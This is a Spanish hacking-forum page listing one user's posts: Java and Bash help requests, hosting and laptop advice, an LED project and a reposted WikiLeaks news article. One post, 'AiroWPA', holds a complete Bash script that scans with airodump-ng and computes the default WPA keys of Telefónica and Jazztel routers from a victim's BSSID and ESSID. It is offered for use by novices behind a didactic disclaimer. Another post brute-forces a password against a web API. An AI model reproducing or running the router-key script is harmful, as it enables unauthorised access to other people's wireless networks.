elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Arreglado, de nuevo, el registro del warzone (wargame) de EHN


  Mostrar Temas
Páginas: [1] 2 3
1  Programación / Java / Ayuda con problema [Resuelto] en: 12 Noviembre 2011, 18:32 pm
Hola buenas, estoy dando la cabeza con un problema de una pagina web en Java y no lo consigo, tengo todo menos la parte de calcular. Aqui os pongo el problema (No todo el enunciado porque hay una parte que no sirve).

Citar
Tanto el nombre del grupo y el nombre del cometa son convertidos en un número de la siguiente manera: el número final es simplemente el producto de todas las letras en el nombre, donde "A" es 1 y "Z" es 26. Por ejemplo, el grupo "USACO" sería 21 * 19 * 1 * 3 * 15 = 17955. Si el número del grupo módulo 47 es el mismo que el número del cometa módulo 47, entonces tú necesitas decirle al grupo ¡Alístense¡ (Recuerda que "a mod b" es el residuo después de dividir a por b; 34 mod 10 es 4.)

Escribe un programa el cual lea el nombre de un cometa y el nombre de un grupo y encuentre si de acuerdo al método antes descrito el grupo debe ir en el OVNI detrás de ese cometa y en ese caso imprima "GO", y si no "STAY". Los nombres de los grupos y de los cometas serán cadenas de letras mayúsculas sin espacios ni caracteres de puntuación, hasta de 6 caracteres de longitud.

Ejemplos:

Entrada    Salida
COMETQ
HVNGAT      GO
------------------------
ABSTAR
USACO      STAY


Y este es el código que tengo hecho

Código
  1. public class ride {
  2. private int valorGrupo;
  3. private int valorNave;
  4. private int mod;
  5. private String grupo;
  6. private String nave;
  7. private BufferedReader in;
  8. private PrintWriter out;
  9. private StringTokenizer st;
  10.  
  11. public ride() throws Exception{
  12. try
  13. {
  14. in = new BufferedReader(new InputStreamReader(this.getClass().getResourceAsStream(this.getClass().getSimpleName()+".in")));
  15. out = new PrintWriter(new FileWriter(this.getClass().getSimpleName()+".out"));
  16.  
  17. String datos = in.readLine().trim();
  18. st = new StringTokenizer(datos);
  19. nave = st.nextToken();
  20.  
  21. while((datos = in.readLine()) != null){
  22. st = new StringTokenizer(datos);
  23. grupo = st.nextToken();
  24.  
  25. }
  26.  
  27. if(grupo.length() > 6 || grupo.length() == 0 || nave.length() > 6 || nave.length() == 0)
  28. System.exit(0);
  29.  
  30.  
  31. valorGrupo = 1;
  32. valorNave = 1;
  33.  
  34. for(int i = 0; i < grupo.length(); i++){
  35. valorGrupo *= Character.getNumericValue(grupo.charAt(i));
  36. }
  37.  
  38. for(int i = 0; i < nave.length(); i++){
  39. valorNave *= Character.getNumericValue(nave.charAt(i));
  40. }
  41.  
  42. mod = 47;
  43.  
  44.  
  45. }catch (Exception e) {
  46. throw new Exception(e);
  47. }finally
  48. {
  49. if(in != null)
  50. in.close();
  51. if(out != null)
  52. out.close();
  53. }
  54. }
  55.  
  56.  
  57. public static void main(String[] args) {
  58. try
  59. {
  60. new ride();
  61. System.exit(0);
  62. }catch(Exception e){
  63. e.printStackTrace();
  64. System.exit(-1);
  65. }
  66. }
  67. }
  68.  

Las clases in y out seria para los archivos en donde se encuentra los datos (in) y out (la escritura de si es GO o Stay). Llevo tiempo dando el coco pero no consigo sacar la maldita operacion, o es que lo comprendo mal o no lo se.
2  Programación / Desarrollo Web / Un buen host para web y foro en: 24 Abril 2011, 18:34 pm
Hola buenas, estoy involucrado en un proyecto entre 9 personas (cada uno en su respectivo campo) de una página WEB, en principio teníamos servidor propio pero el que lo mantiene no puede por falta de tiempo entonces hemos decidido contratar un Host pero no sabemos cual es mejor.
Nuestro proyecto esta compuesto de un foro y web. El proyecto esta hecho con base de Joomla, es decir, el host tiene que tener compatibilidad con Joomla, también el host si es posible que se pueda realizar pagos por Paypal.
El host que he encontrado por ahora que me cumple los dos requisitos (al menos que cumpla el de Joomla) es Bluehost. He estado buscando sobre esa empresa y dicen que es muy bueno respecto calidad/precio, un buen servicio técnico, viene con el Cpanel incluido y permite SSH. Me gustaría si alguien lo ha usado, lo usa o conoce alguien que lo ha usado que le pareció esa empresa.
Por último también me podéis recomendar mas empresas que al menos tenga compatibilidad con Joomla y si es posible pago por Paypal, para no tener que asociarlo a ninguna cuenta bancaria ni nada por el estilo.
3  Programación / Java / Juegos en POO [SOLUCIONADO] en: 7 Marzo 2011, 19:14 pm
Hola buenas, tengo pensado hacer un pequeño juego en 2D en Java (Luego portar lo a Android) pero la cuestión, es que no encuentro documentación muy detallada (He encontrado poca cosa pero me es insuficiente) sobre como hacer juegos en POO (más concreto Java), ya que no se como aplicar la física en un sprite, técnicas de buffer para las imágenes y étc. Si alguien me diese información de como hacerlo se lo agradecería un montón. Un Saludo a todos.
4  Seguridad Informática / Wireless en Linux / AiroWPA en: 6 Febrero 2011, 17:13 pm
Hola buenas, como todos estaréis al corriente de que se filtrado el algoritmo de las contraseñas WAP de Telefónica y Jazztel, pues bien, me he descargado el script en Bash, que estaba hecho por a.s.r y lo he editado un poco (Pero el algoritmo esta intacto, solo he editado el paso de variables y he añadido unas cosas) y también le he añadido airodump-ng para que sea mas fácil saber la BSSID de la víctima (lo hice para noveles o para los que no se quieren romper la cabeza). Por último, yo no me hago responsable del uso que se le puede dar a terceros (También tengo el aviso en el script) porque quiero enseñar la facilidad de sacar estas contraseñas ahora (eso se encarga la parte de a.s.r) y si esta automatizado el proceso para saber las cosas necesarios en menos de 1 min ya tienes la contraseña (Esa es mi parte, hay muy poca iteración con el usario). Como el saber es libre, aquí tenéis el script
Código
  1. #/bin/bash/
  2.  
  3. #############################################################################################################################################
  4. # Esta parte del script esta hecho por Afsoon (a excepción del algoritmo que esta implantado por a.s.r), yo no me hago responsable del uso # que se le puede dar a terceros, yo hago esto con fines didácticos, para mostrar la poca seguridad de los routers de Telefónica (WLAN_XXXX) # y Jazztel y con la facilidad que se sacan si el proceso se automatiza .
  5. #############################################################################################################################################
  6.  
  7. #Variable de la interfaz que se deberá de escribir antes de iniciar el script
  8. INTERFAZ=
  9. # Se encarga de preguntar antes del inicio si ha escrito la interfaz para ejecutar airodump para saber la ESSID y BSSID
  10.  
  11. echo "Antes de ejecutar este script, ustede debe de haber"
  12. echo "abierto el script y escrito en la variable INTERFAZ"
  13. echo "su interfaz que se usará para airodump"
  14. echo "si no lo ha hecho diga no ahora, escriba la interfaz"
  15. echo "y vuelva a abrir el script y diga si"
  16.  
  17. echo "Ha escrito su interfaz [s]i\[n]o"
  18. read opc
  19.  
  20. if [ $opc == "s" ]; then
  21.  
  22. # Esta parte mostrara el airodump para ver la BSSID y ESSID
  23.  
  24. clear
  25. echo "Ahora se usara airodump, para saber la BSSID y ESSID al"
  26. echo "que desea atacar. Usted puede parar el proceso cuando quiera"
  27. echo "Cuando pare el proceso pasaremos a generar la contraseña"
  28. echo "una vez obtenido los datos necesirarios que se dice a continuación"
  29. echo "Se le abrira Gedit en paralelo a airodump"
  30. echo "y copia el BSSID y ESSID de la víctima"
  31.  
  32. trap 'airodump' INT;
  33. airodump()
  34. {
  35.  
  36. # Ahora ejecuta el script que generara la contraseña pero con unas cuantas variaciones
  37. # en el que hay un paso de variables por teclado
  38. clear
  39. echo CalcWLAN by a.s.r and some edited by Afsoon # NO HE EDITADO EL ALGORITMO
  40.  
  41. echo "Ahora se mostrara lo que debes de escribir"                                                                    
  42.  
  43. echo "Inserte su ESSID"
  44. echo "Por ejemplo WLAN_C58D"
  45.  
  46. read ESSID
  47.  
  48. echo "Inserte el BSSID"
  49. echo "Por ejemplo 64:68:0C:C5:C5:90"
  50.  
  51. read BSSIDS
  52.  
  53. HEAD=$(echo -n "$ESSID" | tr 'a-z' 'A-Z' | cut -d_ -f2)                                              
  54. BSSID=$(echo -n "$BSSIDS" | tr 'a-z' 'A-Z' | tr -d :)                                                
  55. BSSIDP=$(echo -n "$BSSID" | cut -c-8)                                          
  56. KEY=$(echo -n bcgbghgg$BSSIDP$HEAD$BSSID | md5sum | cut -c-20)                  
  57.  
  58. echo "La clave es $KEY"
  59. exit
  60.  
  61. }
  62.  
  63. sudo airodump-ng $INTERFAZ
  64. wait 2
  65. gedit &
  66. fi
  67.  
  68. if [ $opc == "n" ]; then
  69. exit
  70. fi
  71.  

El funcionamiento del Script es muy simple:

1- Hace una pregunta para saber si has escrito la interfaz (si no se escribe poco hará el Script)
2- si se dice que si, se le dirá que se usara airodump y gedit, este último para apuntar la BSSID y ESSID y cuando acabe con el proceso se pasará a generar la contraseña
3- Cuando se mata el proceso de airodump y se haya copiado el BSSID y ESSID, se le pedirá que se ingrese los datos correspondientes y ya el algoritmo hace su trabajo y te muestra la contraseña.
5  Foros Generales / Foro Libre / Ingenería de Computadores en: 23 Enero 2011, 09:29 am
Hola buenas, me gustaría saber la opinión de la gente sobre esta carrera, me da igual en el año que este (Preferentemente del 3 o 4 año jeje) y que nota de Selectividad necesito para entrar en la carrera
6  Programación / Programación General / Necesito consejo de como implantar un Algoritmo en: 17 Enero 2011, 19:50 pm
Hola buenas, tengo unos algoritmos hechos por mí de forma matemática, con todos los pasos y que hacer en cada momento, pero cuando intento implementarlo en forma de programación no se como hacerlo, no se como plasmar las operaciones, pero en cuanto que métodos usar o librerías eso lo tengo claro, mi problema es la hora de implementarlo, si alguien me podría dar algunos consejos de como hacerlo, se lo agradecería y mucho. Eso es todo.

PD: No se si influirá pero lo estoy haciendo Java (Que es el por el que me he metido un poco)
7  Programación / Scripting / [Bash] No se si tengo bien este script [SOLUCIONADO] en: 5 Enero 2011, 12:52 pm
Hola buenas, estoy en reto con mi amigo para descifrar la contraseña para saber un texto en una imagen, y lo tengo que hacer en bash y usando GET, bueno con lo que lo cifro tiene un api que permite GET y sabiendo algunas de las letras de la contraseña (que me dio) y solo me falta 1 letra que no se cual es y entonces no se si lo estoy pasando bien la variable al comando para que haga la petición con esa variable, aqui pongo el código
Código
  1. #/bin/bash/
  2.  
  3. a=a
  4. m=m
  5. s=s
  6. t=t
  7. r=r
  8.  
  9. u=u
  10. k=k
  11.  
  12. for h in a b c d e f g h i j k l m n ñ o p q r s t u v x y z; do
  13. palabra=$a$m$s$t$r$h$u$k
  14. lwp-request 'http://www.viciao2k3.net/services/cryptimg/api/v1/?url=XXXXX&pass='$palabra'&format=TXT' >> texto
  15. done
  16. exit
  17.  
  18.  
la URL no la he puesto por algunos motivos que conozco, la comillas individuales estan para que no considere los "&" y donde la variable $palabra no hay comillas por si no pasaba el valor y es hay donde no se si esta bien

Código
  1. 'pass='$palabra
  2.  
Si alguien me lo podría decir.
8  Informática / Hardware / Consejos para un portátil. en: 29 Diciembre 2010, 19:17 pm
Hola buenas, estoy buscando que portátil para comprar, tengo como máximo 2244€ (Pero como es lógico no me quiero gastar eso, yo creo que con algo más de 1000€ se tiene uno decente) para gastar, para que la ayuda se más fácil aquí los criterios:

1- No soy Gamer así que descartando los Alienware
2- Su uso será para desarrollo de software (Si no repito en año y medio empiezo la carrera) pero ya le estoy empezando dando caña con el desarrollo de software.
3- Uso también para navegar, ofimática y si eso casualmente algún que otra película o serie y así que el HD esta aceptado.
4- Acepto páginas para portátiles genéricos (por ahora se Dell, Sony y no se si Asus)
5- Por último y algo menos importante, el uso de Windows que se le dará sera muy bajo, mi uso estará muy centrado en Linux.

Por ahora le había echado la vista a un Dell XPS 15 con estas características seleccionada por mi:

-Intel i5 (2,66 GHz, 3M, TurboBoost 3,2 Ghz)
-Pantalla 15,6" FullHD
-4GB SDRAM DDR3
-Tarjeta gráfica NVIDIA® GeForce® 420M GT 1GB(Wireless N1000 Card Only) (Me gustaría saber si es buena esta tarjeta Nvidia)
-Batería de 9 Celdas y 90W/h
-Bluetooth 3.0
- Mas otras características que están aquí http://www1.euro.dell.com/content/products/productdetails.aspx/xps-15?c=es&l=es&s=dhs&cs=esdhs1&baynote_bnrank=0&baynote_irrank=1&~ck=dellSearch

Precio: 1.047,25 € (Sin IVA y con los portes)

A mi me parece bastante bueno, pero estoy abierto a mas posibilidades. Por último es un poco al margen los procesadores de Intel Sandy Bridge (Creo que se escribían así) que mejoras habrán respecto a los actuales i3, i5, i7. Bueno eso es todo y  lo siento por todo lo que he escrito pero para explicar todo y para que no hubiese dudas.
9  Informática / Electrónica / Flash LED en: 29 Diciembre 2010, 15:27 pm
Hola buenas, tengo un proyecto planeado para hacer un flash Led usb (En principio USB para luego pasarlo a un microUSB) para móviles que no tienen, pues no se que tipo LED usar, pensaba usar un LED RGB y usar los tres colores a la vez y saldría el blanco y según leí que es un blanco con mucha fuerza, si alguien me podría recomendar que LED usar. Eso es todo.
10  Foros Generales / Noticias / La gran filtración de WikiLeaks sobre la Corrupción Global incluye a España... en: 25 Noviembre 2010, 19:08 pm
El joven Manning, al principio, no entendía nada. Entenderlo le llevó a una prisión militar, primero en el desierto de Kuwait y ahora en Quantico (Virginia). Allí sigue. Nación Red.
De alguna manera todo se intuye. Lo que sorprenderá es el relato del “embajador” explicando al Departamento de Estado como se lo lleva el “presidente” del país por que los jóvenes soldados han ido a morir.

Luxemburgo, Liechtenstein, Monaco, Belice… Antillas Holandesas. Países recurrentes en las filtraciones históricas de WikiLeaks que están en boca de todos. Incluso del señor Gates cuando llama a los aliados.

El mapa de la corrupción global es obra del propio Departamento de Estado. La filtración: de un australiano en apuros. Los que han visto “algo” explican que los americanos han llevado los “apuntes” de “todo” y hasta se permiten comentarios jocosos en los cables diplomáticos que van a salir sobre lo que se llevan unos y otros. Sobre todo se relata ese momento casi cotidiano a escala mundial y controlado por la CIA y el FBI en que toca mirar a otro lado. Comisiones de guerra.

Rusia, donde los políticos roban y los periodistas combativos son asesinados y reciben palizas que les fracturan el craneo, Afganistán y la corrupción en Palacio, Iraq y el latrocinio generalizado que no evitó la llegada los aliados de las Azores con el presidente de Europa, Barroso, al frente.

Países olvidados que encarcelan blogueros y cuyos dirigentes cometen delitos impunemente: Kazajistán, Kirguizistan, Tadyikistan, Turkmenistán y Uzbekistán y Azerbaiyán: escala de tránsito para las tropas que van a Afganistán.

No falta el Vaticano y los abusos sexuales a niños que conocía todo el mundo ¿hace años? – “la Interpol no debe actuar” – o el Libano y el terrible caso del magnicidio del presidente seguido de grandes transferencias, paraiso fiscal mediante, de dos países para influir sobre la sentencia que nunca llega. Tráfico de armas y política. Escuchas y más escuchas. Hasta hoy. ¿Cómo hemos llegado hasta aquí? Por la dimisión de los poderes: Prensa y Justicia.

Microsoft y las injerencias externas. La Banca y las “ayudas” que luego se devuelven, cuando entran en crisis, mediante un decreto a la medida. Después de saquear el banco. Las Fundaciones, ay, las fundaciones… y los influyentes señores. Siempre Defensa, Washington Boulevard. Biden y el cristal de Tiffany.

El enviado de la República mintiendo a las familias de los ingenieros que fueron asesinados en Pakistán. Procedimiento habitual: financiación de partidos a nivel global, – ay, la Internacional -, injerencia interna permanente, control de Defensa (tráfico de armas, espionaje y servicios secretos (pdf)), Copyright (patentes). Control de Internet. Lo que todo el mundo sabía en un link. Lo que el “soldado Manning“, único detenido en toda esta historia descubrió:

Es entonces cuando un Manning que está expresando su “hartazgo y desencanto” por lo que ha podido descubrir, escribe a Adrian Lamo:
... afecta a todos en la tierra … en todas partes hay un cable de los EE.UU. ... hay un escándalo diplomático que revelar … Islandia, el Vaticano, España, Brasil, Mada(ga)scar.

Según un investigador británico que como en los peores tiempos del IRA ha vuelto a tomar medidas de protección personal, uno de los casos más graves desde el punto de vista político a nivel global es el del presidente de Iraq Nuri al-Maliki. “Es el caso paradigmático del nivel de pobredumbre en el que nos han metido. Hemos dejado robar y puesto al frente de Iraq a alguien que tiene precio y mantiene relaciones económicas y políticas con el gran enemigo”.

The Guardian ya desveló que Maliki además de corrupto es un traidor. Si preguntan por allí les dirán “que no nos sorprende que la noticia tenga poco recorrido”. Así está el mundo:

Muqtada al Sadr ha sido el hombre clave del pacto secreto entre Mahmoud Ahmadinejad y Maliki. Un pacto que incluye a Siria, el Líbano de Hezbolá y las más altas autoridades chiítas del Islam.
El gran aliado de los periodistas combativos, que son linchados, asesinados o vuelven a mirar hacia atrás cuando la noche o la bruma presenta sus perfiles más tenebrosos, es Internet. Explica Julian Assange que el mundo ya no será reconocible – ni el pasado ni el presente – cuando en unas semanas o meses “los leaks“ de la gran corrupción mundial sean links. El mundo puede experimentar el cambio pacifico más grande en términos políticos de su historia gracias a Internet. ¿El mapa de la corrupción o el mapa de la política?.

Hay que regenerar la representación política. No mirar para otro lado. Es la hora de los ciudadanos digitales. Hay que recuperar un principio fundamental: πολιτικος. Internet tiene mucho que decir.

Fuente:www.nacionred.com
Páginas: [1] 2 3
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines